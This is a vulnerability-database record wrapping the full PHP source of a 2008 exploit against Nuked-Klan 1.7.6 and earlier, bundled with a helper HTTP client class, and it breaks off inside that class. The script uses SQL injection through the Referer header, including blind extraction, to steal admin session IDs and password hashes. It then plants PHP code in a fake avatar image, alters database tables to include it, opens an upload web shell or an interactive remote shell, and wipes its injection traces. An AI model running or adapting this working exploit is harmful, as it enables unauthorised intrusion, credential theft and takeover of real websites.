DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:65120", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "nk_exploit.txt", "description": "", "published": "2008-04-03T00:00:00", "modified": "2008-04-03T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/65120/nk_exploit.txt.html", "reporter": "real", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:16:05", "viewCount": 21, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "_state": {"dependencies": 1678911500, "score": 1683818601, "epss": 1678917342}, "_internal": {"score_hash": "559f8870870c3b47a445c03ced316a5c"}, "sourceHref": "https://packetstormsecurity.com/files/download/65120/nk_exploit.txt", "sourceData": "`<?php \n \n/* \n* Name: Nuked-Klan <= 1.7.6 Multiple Vulnerabilities Exploit \n* Credits: Charles \"real\" F. <charlesfol[at]hotmail.fr> \n* URL: http://realn.free.fr/releases/46556 \n* Date: 04-01-08 \n* \n* -> Remote Code Execution \n* -> Remote File Upload \n* -> Admin Hash Extraction \n* \n* Remote Code Exec vulnerability used in \n* this exploit was discovered by DarkFig. \n*/ \n \nprint \"\\n\"; \nprint \" Nuked-Klan <= 1.7.6 Multiple Vulnerabilities Exploit\\n\"; \nprint \" by Charles \\\"real\\\" F. <charlesfol[at]hotmail.fr>\\n\\n\\n\"; \n \nif($argc<3) \n{ \nprint \" usage: ./nk_exploit.php -url <url> [options]\\n\\n\"; \nprint \" Options: -mode 0 -> Remote Upload (default)\\n\"; \nprint \" 1 -> Remote Code Execution\\n\"; \nprint \" 2 -> Admin Hash Extraction\\n\"; \nprint \" -admin If you have an admin account.\\n\"; \nprint \" -user If STATS page needs registration,\\n\"; \nprint \" you can set an account.\\n\"; \nprint \" -proxy If you want to use a proxy.\\n\"; \nprint \" -prefix Cookie prefix (default: nuked_).\\n\"; \nprint \" -file If you wanna upload a specific file\\n\"; \nprint \" else it will upload a simple uploader.\\n\"; \nprint \"\\n\"; \nprint \" eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd\\n\"; \nprint \" eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118\\n\\n\"; \ndie(); \n} \n \n$url = getparam(\"url\",1); \n$mode = getparam(\"mode\") ? getparam(\"mode\"): 0; \n$adm = getparam(\"admin\"); \n$acc = getparam(\"user\"); \n$prx = getparam(\"proxy\"); \n \n$prefix = getparam(\"prefix\") ? getparam(\"prefix\") : \"nuked_\"; \n \n$file_upload_code = getparam(\"file\") ? file_get_contents(getparam(\"file\")) : '<?php if(isset($_POST[\\'upload\\'])) { if( !move_uploaded_file($_FILES[\\'file\\'][\\'tmp_name\\'], \"./\".$_FILES[\\'file\\'][\\'name\\'])) echo(\"<center>Error \".$_FILES[\\'file\\'][\\'error\\'].\"</center>\");else echo \"<center>File uploaded</center>\"; } ?><form method=\"post\" enctype=\"multipart/form-data\"><center><input type=\"file\" name=\"file\"><input type=\"submit\" name=\"upload\" value=\"Upload\"></center></form>';; \n \n$date = array(date('Y'),date('m'),date('d')); \n \n$xpl = new phpsploit(); \nif($prx) $xpl->proxy($prx); \n \n/* Admin account defined */ \nif($adm) \n{ \nprint \"[*] Using admin account $adm\\n\"; \nlist($login,$passwd) = explode(\":\",$adm); \n$xpl->addheader(\"Referer\",$url); \n$c = $xpl->post($url.\"index.php?file=User&{$prefix}nude=index&op=login\",\"pseudo=$login&pass=$passwd&remember_me=ok\"); \nif(preg_match(\"#{$prefix}sess_id=([a-z0-9]+)#i\",$c,$sid) && preg_match(\"#uid=([a-z0-9]+)#i\",$c,$uid)) \n{ \n$admin_sid = $sid[1]; \n$admin_uid = $uid[1]; \nprint \" SID -> $admin_sid\\n\"; \nprint \" UID -> $admin_uid\\n\"; \nfinalattack($admin_sid,$admin_uid); \n} else exit(\"[*] Can't log in\\n\"); \n} \n/* Admin account not defined */ \nelse \n{ \n/* User account defined */ \nif($acc) \n{ \nprint \"[*] Using user account $acc\\n\"; \nlist($login,$passwd) = explode(\":\",$acc); \n$xpl->addheader(\"Referer\",$url); \n$c = $xpl->post($url.\"index.php?file=User&nuked_nude=index&op=login\",\"pseudo=$login&pass=$passwd&remember_me=ok\"); \nif(preg_match(\"#{$prefix}sess_id=([a-z0-9]+)#i\",$c,$sid) && preg_match(\"#uid=([a-z0-9]+)#i\",$c,$uid)) \n{ \n# User Cookies \n$xpl->addcookie(\"{$prefix}sess_id\",$sid[1]); \n$xpl->addcookie(\"{$prefix}user_id\",$uid[1]); \n} else exit(\"[*] Can't log in\\n\"); \n} \n \n$queries = array(); \n$queries[] = array(\" SID\",\"SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1\"); \n$queries[] = array(\" UID\",\"SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1\"); \n$queries[] = array(\" Login\",\"SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1\"); \n$queries[] = array(\"Password\",\"SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1\"); \n \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",\"127.0.0.1\"); \n \n$ctmp = $xpl->get($url.\"index.php?file=Stats&page=visits\"); \n \nif(preg_match('#<a href=\"javascript:history.back\\(\\)\"><b>[^<]+</b>#i',$ctmp)) exit(\"[*] You don't have rights to access Stats page.\\n\"); \nif(preg_match('#<a href=\"index.php\\?file=User&op=login_screen\">[^<]+</a> | <a href=\"index.php\\?file=User&op=reg_screen\">[^<]+</a>#i',$ctmp)) exit(\"[*] You must be registered, use -user param.\\n\"); \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n \nattack1(); \nattack2(); \n} \n \nfunction getparam($param,$opt='') \n{ \nglobal $argv; \nforeach($argv as $value => $key) \n{ \nif($key == '-'.$param) return $argv[$value+1]; \n} \nif($opt) exit(\"\\n-$param parameter required\"); \nelse return; \n} \n \n/* --- Attack #1 ---------------------------------------- */ \n \nfunction attack1() \n{ \nglobal $queries,$mode; \n \nprint \"[*] Attack #1\\n\"; \n \nif($mode != 2) \n{ \nprint \" \".$queries[0][0].\" -> \"; \n$admin_sid = sql_session_query($queries[0][1],0); \n \nif(!$admin_sid) return false; \n \nif($admin_sid==\"\") \n{ \nprint \"\\r[*] No session found. Crack following MD5 hash and use -admin param.\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \nsql_user_query($queries[$i][1]); \n} \nexit(); \n} \nelse \n{ \nprint \"\\n \".$queries[1][0].\" -> \"; \n$admin_uid = sql_session_query($queries[1][1]); \nfinalattack($admin_sid,$admin_uid); \n} \n} \nelse \n{ \nprint \"\\r[*] Getting admin credentials\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \n$z = sql_user_query($queries[$i][1]); \nif(!$z || $z == \"\") return false; \n} \nexit(); \n} \n} \n \nfunction attack1_init() \n{ \nglobal $xpl,$url; \n \n$rnd = rand(100000,999999); \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",\"255.255.255.255\"); \n$xpl->addheader(\"Referer\",\"http://g00gle.com','1','1','$rnd','1','1') #\"); \n$xpl->get($url.\"index.php\"); \n \nreturn $rnd; \n} \n \nfunction sql_session_query($query,$z=1) \n{ \n$result = ''; \n$rnd = attack1_init(); \n$size = 20; \nfor($i=1;$i<=$size;$i++) \n{ \n$r = get_ord($query,$i,$rnd); \nif(!$r) break; \n$result .= chr($r); \nprint chr($r); \n} \nif($z==1) print \"\\n\"; \nreturn $result; \n} \n \nfunction sql_user_query($query) \n{ \n$result = ''; \nfor($i=1;$i<=50;$i++) \n{ \n$r = get_ord($query,$i,attack1_init()); \nif(!$r) break; \n$result .= chr($r); \nprint chr($r); \n} \nprint \"\\n\"; \nreturn $result; \n} \n \nfunction get_ord($query,$a,$rnd) \n{ \nglobal $xpl,$url; \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",\"255.255.255.255\"); \n$xpl->addheader(\"Referer\",\"http://g00gle.com','1',CONCAT({$a}000,ORD(MID(($query),$a,1))),'$rnd','1','1') #\"); \n$content = $xpl->get($url.\"index.php?file=Stats&page=visits&oyear=$rnd&omonth=1\"); \npreg_match('#<option[^>]*>'.$a.'000(\\d+)</option>[^:]*</select> /#i',$content,$res); \n \nif(!isset($res[1]) && $a==1) \n{ \nprint \"\\r\"; \nprint \"[*] Attack failed.\\n\\n\"; \nreturn false; \n} \nif(!isset($res[1])) return \"\"; \nreturn $res[1]; \n} \n \n/* --- Attack #2 ---------------------------------------- */ \n \nfunction attack2() \n{ \nglobal $queries,$mode,$admin_sid,$admin_uid; \n \nprint \"[*] Attack #2\\n\"; \n \nif($mode != 2) \n{ \nprint \" \".$queries[0][0].\" -> \"; \n$admin_sid = blind($queries[0][1],20,48,122); \n \nif($admin_sid==\"\") \n{ \nprint \"\\r[*] No session found. Crack following MD5 hash and use -admin param.\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \nblind($queries[$i][1],50,48,122); \nprint \"\\n\"; \n} \nexit(); \n} \nelse \n{ \nprint \"\\n \".$queries[1][0].\" -> \"; \n$admin_uid = blind($queries[1][1],20,48,122); \nprint \"\\n\"; \nfinalattack($admin_sid,$admin_uid); \n} \n} \nelse \n{ \nprint \"\\r[*] Getting admin credentials\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \nblind($queries[$i][1],50,48,122); \nprint \"\\n\"; \n} \nexit(); \n} \n} \n \nfunction blind($query,$nbchars,$from,$to) \n{ \nglobal $xpl,$url,$date; \n \n$result = \"\"; \n$current_letter = 1; \n \n/* let's test first if there is a value ... */ \n \n$ip = \"82.237.\".rand(1,10).\".\".rand(1,250); \n$rnd = rand(100,1000000); \n$q = preg_replace(\"#(\\w*) FROM #i\",\"COUNT($1) FROM \",$query,1); \n$sql = \"http://g00gle$rnd.com' OR ($q)>0 #\"; \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",$ip); \n$xpl->addheader(\"Referer\",\"$sql\"); \n$c=$xpl->get($url.\"index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=$date[0]&omonth=$date[1]&oday=$date[2]\"); \nif(!preg_match('#g00gle'.$rnd.'[^>]+</a></td>[\\r\\t\\n]*<td[^>]*>[1-9]\\d* \\(\\d+%\\)</td>#',$xpl->getcontent(),$matches)) return false; \n \nwhile($current_letter<=$nbchars) \n{ \n$add=$from; \nfor($i=intval(($to-$from)/2);$i>1;$i=intval($i/2)) \n{ \nif(get($query,\">\",$current_letter,$add+$i)) $add+=$i+1; \n} \n \nfor($ord=$add;;$ord++) \n{ \nif(get($query,\"=\",$current_letter,$ord)) \n{ \nprint strtolower(chr($ord)); \n$result .= strtolower(chr($ord)); \nbreak; \n} \nelseif($ord==$add+$i+3) return $result; \n} \n \n$current_letter++; \n} \n \nreturn $result; \n} \n \nfunction get($query,$sign,$d,$f) \n{ \nglobal $xpl,$url,$date; \n \nwhile(true) \n{ \n$ip = \"82.237.\".rand(1,10).\".\".rand(1,250); \n$rnd = rand(100,1000000); \n$sql = \"http://g00gle$rnd.com' OR ORD(MID(($query),$d,1))$sign$f #\"; \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",$ip); \n$xpl->addheader(\"Referer\",\"$sql\"); \n$c=$xpl->get($url.\"index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=$date[0]&omonth=$date[1]&oday=$date[2]\"); \nif(preg_match('#g00gle'.$rnd.'[^>]+</a></td>[\\r\\t\\n]*<td[^>]*>[1-9]\\d* \\(\\d+%\\)</td>#',$xpl->getcontent(),$matches)) return true; \nif(preg_match('#g00gle'.$rnd.'#',$xpl->getcontent())) break; \n} \n \nreturn false; \n} \n \nfunction finalattack($admin_sid,$admin_uid) \n{ \nglobal $url,$xpl,$mode,$prefix,$file_upload_code; \n \nprint \"\\n[*] Admin status confirmed.\\n\"; \n \n# Admin Cookies \n$xpl->reset(\"cookie\"); \n$xpl->addcookie(\"{$prefix}sess_id\",$admin_sid); \n$xpl->addcookie(\"{$prefix}user_id\",$admin_uid); \n$xpl->addcookie(\"{$prefix}admin_session\",$admin_uid); \n \nprint \"[*] Uploading fake image ... \"; \n \n/* Code in the fake avatar */ \nif($mode==0) /* upload code */ \n{ \n$c0de = '<?php'.\"\\n\" \n.\"error_reporting(0);\" \n.\"if(isset(\\$_SERVER['HTTP_UPLOAD'])) { \\$f=fopen('w00t.php','w');fputs(\\$f,'\".preg_replace(\"#'#i\",\"\\\\'\",$file_upload_code).\"');print 'upfiledone'; }\\n\" \n.'include(\\'./Includes/blocks/block_login.php\\');$blok[type]=\\'login\\'; ?>'; \n} \nelse /* shell code */ \n{ \n$c0de = '<?php'.\"\\n\" \n.'error_reporting(0);' \n.'if(isset($_SERVER[HTTP_SHELL]))' \n.'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' \n.'else {include(\\'./Includes/blocks/block_login.php\\');$blok[type]=\\'login\\';} ?>'; \n} \n \n/* This is based on DarkFig's code (http://mgsdl.free.fr/?1:30) */ \n/* It was a little changed to permit 2 modes: upload/code exec */ \n \n$phpc = array( \nfrmdt_url => $url.'?file=User&op=update_pref', \n'fichiernom' => array(frmdt_filename => '1.jpg', \nfrmdt_content => $c0de)); \n \n$xpl->addheader('Referer',$url); \n$xpl->formdata($phpc); \n \n$f = fopen(\"zzz.jpg\",\"w\"); \nfputs($f,$c0de); \nfclose($f); \n \n$xpl->get($url.'?file=User&op=edit_pref'); \n \nif(!preg_match('#\\<input name=\\\"photo\\\" value=\\\"(\\S+)\\\"#',$xpl->getcontent(),$match)) exit(\"error.\\n\"); \n \nprint \"done.\\n\"; \n \nprint \"[*] Processing SQL queries ... \"; \n \n$sql = array(); \n$sql[] = \"ALTER TABLE nuked_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;\"; \n$sql[] = \"UPDATE nuked_block SET type=\".char('/../../../'.$match[1].\"\\x00\").\" WHERE bid=1;\"; \n$sql[] = \"DELETE FROM nuked_stats_visitor WHERE referer LIKE 0x25673030676c6525;\"; /* added by real to delete our SQL Injection from SQL DB */ \n$sql[] = \"DELETE FROM nuked_nbconnecte;\"; \n \nfor($i=0;$i<count($sql);$i++) \n$xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]); \n \nprint \"done.\\n\"; \n \n/* Final step: File Upload or Code Execution */ \nif($mode==0) /* Upload */ \n{ \n$xpl->addheader(\"Upload\",\"1\"); \n$c = $xpl->get($url); \nif(preg_match(\"#upfiledone#i\",$c)) print \"[*] File uploaded.\\n\\n\"; \nelse exit(\"[*] File upload error.\\n\"); \nprint \"[*] \".$url.\"w00t.php\\n\"; \n} \nelse /* Shell */ \n{ \nprint \"\\n\\$shell> \"; \nwhile(!preg_match(\"#^(quit|exit)$#\",($cmd = trim(fgets(STDIN))))) \n{ \n$xpl->reset('header'); \n$xpl->addheader('Shell',\"system('$cmd');\"); \n$xpl->get($url); \n$data = explode('123456789',$xpl->getcontent()); \nprint $data[1].\"\\n\\$shell> \"; \n} \n} \n \n/* End of DarkFig based code */ \n \nexit(); \n} \n \nfunction char($data) \n{ \n$char='CHAR('; \nfor($i=0;$i<strlen($data);$i++) \n{ \n$char .= ord($data[$i]); \nif($i != (strlen($data)-1)) $char .= ','; \n} \nreturn $char.')'; \n} \n \n/* \n* \n* Copyright (C) darkfig \n* \n* This program is free software; you can redistribute it and/or \n* modify it under the terms of the GNU General Public License \n* as published by the Free Software Foundation; either version 2 \n* of the License, or (at your option) any later version. \n* \n* This program is distributed in the hope that it will be useful, \n* but WITHOUT ANY WARRANTY; without even the implied warranty of \n* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n* GNU General Public License for more details. \n* \n* You should have received a copy of the GNU General Public License \n* along with this program; if not, write to the Free Software \n* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. \n* \n* TITLE: PhpSploit Class \n* REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4) \n* VERSION: 1.2 \n* LICENSE: GNU General Public License \n* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt \n* FILENAME: phpsploitclass.php \n* \n* CONTACT: gmdarkfig@gmail.com (french / english) \n* GREETZ: Sparah, Ddx39 \n* \n* DESCRIPTION: \n* The phpsploit is a class implementing a web user agent. \n* You can add cookies, headers, use a proxy server with (or without) a \n* basic authentification. It supports the GET and the POST method. It can \n* also be used like a browser with the cookiejar() function (which allow \n* a server to add several cookies for the next requests) and the \n* allowredirection() function (which allow the script to follow all \n* redirections sent by the server). It can return the content (or the \n* headers) of the request. Others useful functions can be used for debugging. \n* A manual is actually in development but to know how to use it, you can \n* read the comments. \n* \n* CHANGELOG: \n* [2007-01-24] (1.2) \n* * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) \n* * New: multipart/form-data enctype is now supported \n* \n* [2006-12-31] (1.1) \n* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) \n* * New: You can now call the getheader() / getcontent() function without parameters \n* \n* [2006-12-30] (1.0) \n* * First version \n* \n*/ \n \nclass phpsploit { \n \n/** \n* This function is called by the get()/post() functions. \n* You don't have to call it, this is the main function. \n* \n* @return $server_response \n*/ \nprivate function sock() \n{ \nif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); \nelse $socket = fsockopen($this->host,$this->port); \n \nif(!$socket) die(\"Error: The host doesn't exist\"); \n \nif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\"; \nelseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. \" HTTP/1.1\\r\\n\"; \nelse die(\"Error: Invalid method\"); \n \nif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\"; \n$this->packet .= \"Host: \".$this->host.\"\\r\\n\"; \n \nif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\"; \nif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\"; \nif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\"; \n \n$this->packet .= \"Connection: Close\\r\\n\"; \nif($this->method===\"post\") \n{ \n$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\"; \n$this->packet .= $this->data.\"\\r\\n\"; \n} \nelseif($this->method===\"formdata\") \n{ \n$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\"; \n$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\"; \n$this->packet .= $this->data; \n} \n$this->packet .= \"\\r\\n\"; \n$this->recv = ''; \n \nfputs($socket,$this->packet); \nwhile(!feof($socket)) $this->recv .= fgets($socket); \nfclose($socket); \n \nif($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); \nif($this->allowredirection) return $this->allowredirection($this->recv); \nelse return $this->recv; \n} \n \n \n/** \n* This function allows you to add several cookie in the \n* request. Several methods are supported: \n* \n* $this->addcookie(\"name\",\"value\"); \n* or \n* $this->addcookie(\"name=newvalue\"); \n* or \n* $this->addcookie(\"othername=overvalue; xx=zz; y=u\"); \n* \n* @param string $cookiename \n* @param string $cookievalue \n* \n*/ \npublic function addcookie($cookn,$cookv='') \n{ \n// $this->addcookie(\"name\",\"value\"); work avec replace \nif(!empty($cookv)) \n{ \nif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete \nif(!empty($this->cookie)) \n{ \nif(preg_match(\"/$cookn=/\",$this->cookie)) \n{ \n$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie); \n} \nelse \n{ \n$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \". \n} \n} \nelse \n{ \n$this->cookie = $cookn.\"=\".$cookv.\";\"; \n} \n} \n// $this->addcookie(\"name=value; othername=othervalue\"); \nelse \n{ \nif(!empty($this->cookie)) \n{ \n$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn); \n$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn)); \nfor($i=0;$i<count($cookarr);$i++) \n{ \npreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches); \n$cookn = $matches[1]; \n$cookv = $matches[2]; \n$this->addcookie($cookn,$cookv); \n} \n} \nelse \n{ \n$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\"; \n$this->cookie = $cookn; \n} \n} \n} \n \n \n/** \n* This function allows you to add several headers in the \n* request. Several methods are supported: \n* \n* $this->addheader(\"headername\",\"headervalue\"); \n* or \n* $this->addheader(\"headername: headervalue\"); \n* \n* @param string $headername \n* @param string $headervalue \n*/ \npublic function addheader($headern,$headervalue='') \n{ \n// $this->addheader(\"name\",\"value\"); \nif(!empty($headervalue)) \n{ \nif(!empty($this->header)) \n{ \nif(preg_match(\"/$headern:/\",$this->header)) \n{ \n$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header); \n} \nelse \n{ \n$this->header .= \"\\r\\n\".$headern.\": \".$headervalue; \n} \n} \nelse \n{ \n$this->header=$headern.\": \".$headervalue; \n} \n} \n// $this->addheader(\"name: value\"); \nelse \n{ \nif(!empty($this->header)) \n{ \n$headarr = explode(\": \",$headern); \n$headern = $headarr[0]; \n$headerv = $headarr[1]; \n$this->addheader($headern,$headerv); \n} \nelse \n{ \n$this->header=$headern; \n} \n} \n} \n \n \n/** \n* This function allows you to use an http proxy server. \n* Several methods are supported: \n* \n* $this->proxy(\"proxyip\",\"8118\"); \n* or \n* $this->proxy(\"proxyip:8118\") \n* \n* @param string $proxyhost \n* @param integer $proxyport \n*/ \npublic function proxy($proxy,$proxyp='') \n{ \n// $this->proxy(\"localhost:8118\"); \nif(empty($proxyp)) \n{ \npreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr); \n$proxh = $proxarr[1]; \n$proxp = $proxarr[2]; \n$this->proxyhost=$proxh; \n$this->proxyport=$proxp; \n} \n// $this->proxy(\"localhost\",8118); \nelse \n{ \n$this->proxyhost=$proxy; \n$this->proxyport=intval($proxyp); \n} \nif($this->proxyport > 65535) die(\"Error: Invalid port number\"); \n} \n \n \n/** \n* This function allows you to use an http proxy server \n* which requires a basic authentification. Several \n* methods are supported: \n* \n* $this->proxyauth(\"darkfig\",\"dapasswd\"); \n* or \n* $this->proxyauth(\"darkfig:dapasswd\"); \n* \n* @param string $proxyuser \n* @param string $proxypass \n*/ \npublic function proxyauth($proxyauth,$proxypasse='') \n{ \n// $this->proxyauth(\"darkfig:password\"); \nif(empty($proxypasse)) \n{ \npreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr); \n$proxu = $proxautharr[1]; \n$proxp = $proxautharr[2]; \n$this->proxyuser=$proxu; \n$this->proxypass=$proxp; \n} \n// $this->proxyauth(\"darkfig\",\"password\"); \nelse \n{ \n$this->proxyuser=$proxyauth; \n$this->proxypass=$proxypasse; \n} \n} \n \n \n/** \n* This function allows you to set the \"User-Agent\" header. \n* Several methods are possible to do that: \n* \n* $this->agent(\"Mozilla Firefox\"); \n* or \n* $this->addheader(\"User-Agent: Mozilla Firefox\"); \n* or \n* $this->addheader(\"User-Agent\",\"Mozilla Firefox\"); \n* \n* @param string $useragent \n*/ \npublic function agent($useragent) \n{ \n$this->agent=$useragent; \n} \n \n \n/** \n* This function returns the header which will be \n* in the next request. \n* \n* $this->showheader(); \n* \n* @return $header \n*/ \npublic function showheader() \n{ \nreturn $this->header; \n} \n \n \n/** \n* This function returns the cookie which will be \n* in the next request. \n* \n* $this->showcookie(); \n* \n* @return $storedcookies \n*/ \npublic function showcookie() \n{ \nreturn $this->cookie; \n} \n \n \n/** \n* This function returns the last formed \n* http request (the http packet). \n* \n* $this->showlastrequest(); \n* \n* @return $last_http_request \n*/ \npublic function showlastrequest() \n{ \nreturn $this->packet; \n} \n \n \n/** \n* This function sends the formed http packet with the \n* GET method. You can precise the port of the host. \n* \n* $this->get(\"http://localhost\"); \n* $this->get(\"http://localhost:888/xd/tst.php\"); \n* \n* @param string $urlwithpath \n* @return $server_response \n*/ \npublic function get($url) \n{ \n$this->target($url); \n$this->method=\"get\"; \nreturn $this->sock(); \n} \n \n \n/** \n* This function sends the formed http packet with the \n* POST method. You can precise the port of the host. \n* \n* $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\"); \n* \n* @param string $urlwithpath \n* @param string $postdata \n* @return $server_response \n*/ \npublic function post($url,$data) \n{ \n$this->target($url); \n$this->method=\"post\"; \n$this->data=$data; \nreturn $this->sock(); \n} \n \n \n/** \n* This function sends the formed http packet with the \n* POST method using the multipart/form-data enctype. \n* \n* $array = array( \n* frmdt_url => \"http://localhost/upload.php\", \n* frmdt_boundary => \"123456\", # Optional \n* \"email\" => \"me@u.com\", \n* \"varname\" => array( \n* frmdt_type => \"image/gif\", # Optional \n* frmdt_transfert => \"binary\", # Optional \n* frmdt_filename => \"hello.php\", \n* frmdt_content => \"<?php echo ':)'; ?>\")); \n* $this->formdata($array); \n* \n* @param array $array \n* @return $server_response \n*/ \npublic function formdata($array) \n{ \n$this->target($array[frmdt_url]); \n$this->method=\"formdata\"; \n$this->data=''; \nif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\"; \nelse $this->boundary=$array[frmdt_boundary]; \nforeach($array as $key => $value) \n{ \nif(!preg_match(\"#^frmdt_(boundary|url)#\",$key)) \n{ \n$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\"; \n$this->data .= \"Content-Disposition: form-data; name=\\\"\".$key.\"\\\";\"; \nif(!is_array($value)) \n{ \n$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\"; \n} \nelse \n{ \n$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\"; \nif(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\"; \nif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\"; \n$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\"; \n} \n} \n} \n$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\"; \nreturn $this->sock(); \n} \n \n \n/** \n* This function returns the content of the server response \n* without the headers. \n* \n* $this->getcontent($this->get(\"http://localhost/\")); \n* or \n* $this->getcontent(); \n* \n* @param string $server_response \n* @return $onlythecontent \n*/ \npublic function getcontent($code='') \n{ \nif(empty($code)) $code = $this->recv; \n$content = explode(\"\\n\",$code); \n$onlycode = ''; \nfor($i=1;$i<count($content);$i++) \n{ \nif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1; \nif($ok) $onlycode .= $content[$i].\"\\n\"; \n} \nreturn $onlycode; \n} \n \n \n/** \n* This function returns the headers of the server response \n* without the content. \n* \n* $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\")); \n* or \n* $this->getheader(); \n* \n* @param string $server_response \n* @return $onlytheheaders \n*/ \npublic function getheader($code='') \n{ \nif(empty($code)) $code = $this->recv; \n$header = explode(\"\\n\",$code); \n$onlyheader = $header[0].\"\\n\"; \nfor($i=1;$i<count($header);$i++) \n{ \nif(!preg_match(\"/^(\\S*):/\",$header[$i])) break; \n$onlyheader .= $header[$i].\"\\n\"; \n} \nreturn $onlyheader; \n} \n \n \n/** \n* This function is called by the cookiejar() function. \n* It adds the value of the \"Set-Cookie\" header in the \"Cookie\" \n* header for the next request. You don't have to call it. \n* \n* @param string $server_response \n*/ \nprivate function getcookie($code) \n{ \n$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code)); \nfor($z=0;$z<count($carr);$z++) \n{ \nif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr)) \n{ \n$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1])); \n} \n} \n \nfor($i=0;$i<count($cookie);$i++) \n{ \npreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches); \n$cookn = $matches[1]; \n$cookv = $matches[2]; \n$this->addcookie($cookn,$cookv); \n} \n} \n \n \n/** \n* This function is called by the get()/post() functions. \n* You don't have to call it. \n* \n* @param string $urltarg \n*/ \nprivate function target($urltarg) \n{ \nif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\"; \n$this->url=$urltarg; \n \n$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg))); \n$this->host=$array[0]; \n 